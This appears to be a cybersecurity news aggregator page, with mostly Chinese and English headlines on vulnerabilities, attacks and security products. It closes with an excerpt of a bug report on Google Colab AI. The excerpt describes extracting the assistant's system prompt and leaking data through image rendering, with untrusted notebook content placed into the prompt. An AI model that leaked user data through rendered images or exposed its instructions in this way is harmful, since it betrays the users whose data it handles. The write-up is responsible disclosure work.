Aggregator
谷歌放弃淘汰第三方Cookie计划,将选择权交给用户
多无人系统协同中的人工智能安全探索
城市供暖系统遭网络攻击被关闭,大量居民在寒冬下停暖近2天
软件安全研发成熟度模型研究与实践
报告发布 | 数世咨询:信创安全市场指南(附下载)
杀疯了!谁说“微软蓝屏”对你没影响?(下)
从Google收购Wiz风波,聊聊云安全态势管理(CSPM)的发展
See Malicious Process Relationships on a Visual Graph
At ANY.RUN, we’re all about making in-depth technical information accessible. One of the ways we do this is by providing you with various detailed, yet easy-to-understand reports on malware behavior. One such report is Process graph. What is Process graph? Process graph is a report that visually shows how system processes, especially malicious ones, relate […]
The post See Malicious Process Relationships <br> on a Visual Graph appeared first on ANY.RUN's Cybersecurity Blog.
2024美国拥有多少核武器?
在审讯过程中快速分裂一个人的 12 种方法
演讲议题巡展 | Windows远程文件协议漏洞挖掘之旅
Patchwork黑客组织瞄准我国科技大学,窃取核心数据!
减少 95% 资源的向量搜索 | 使用云搜索的 DiskANN
⼤模型在⽹络安全⽅⾯的应⽤汇总
Critical Docker Engine Flaw Allows Attackers to Bypass Authorization Plugins
CISA Warns of Exploitable Vulnerabilities in Popular BIND 9 DNS Software
New Chrome Feature Scans Password-Protected Files for Malicious Content
Google Colab AI: Data Leakage Through Image Rendering Fixed. Some Risks Remain.
Google Colab AI, now just called Gemini in Colab, was vulnerable to data leakage via image rendering.
This is an older bug report, dating back to November 29, 2023. However, recent events prompted me to write this up:
- Google did not reward this finding, and
- Colab now automatically puts Notebook content (untrusted data) into the prompt.
Let’s explore the specifics.
Google Colab AI - Revealing the System PromptAt the end of November last year, I noticed that there was a “Colab AI” feature, which integrated an LLM to chat with and write code. Naturally, I grabbed the system prompt, and it contained instructions that begged the LLM to not render images.